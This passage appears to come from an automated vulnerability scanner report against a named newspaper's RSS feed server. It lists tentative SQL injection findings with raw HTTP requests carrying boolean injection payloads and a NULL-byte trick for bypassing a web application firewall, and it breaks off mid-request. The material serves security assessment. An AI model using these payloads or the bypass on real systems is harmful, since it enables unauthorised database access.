Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13599438%20or%201%3d1--%20 and 13599438%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d1--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d2--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.100. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200936.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200936.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:35 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.101. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200939.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200939.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13962808%20or%201%3d1--%20 and 13962808%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d1--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d2--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close


1.102. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200946.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200946.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11601329'%20or%201%3d1--%20 and 11601329'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d1--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:30 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d2--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.103. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200950.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200950.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:49 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:49 GMT
Content-Length: 0
Connection: close


1.104. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200952.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200952.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 84008678'%20or%201%3d1--%20 and 84008678'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d1--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:46 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d2--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.105. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200953.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200953.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:48 GMT
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.106. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200956.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200956.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.107. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:44 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:44 GMT
Content-Length: 0
Connection: close


1.108. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15133132%20or%201%3d1--%20 and 15133132%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d1--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d2--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close


1.109. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200960.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200960.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 14002997'%20or%201%3d1--%20 and 14002997'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d1--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
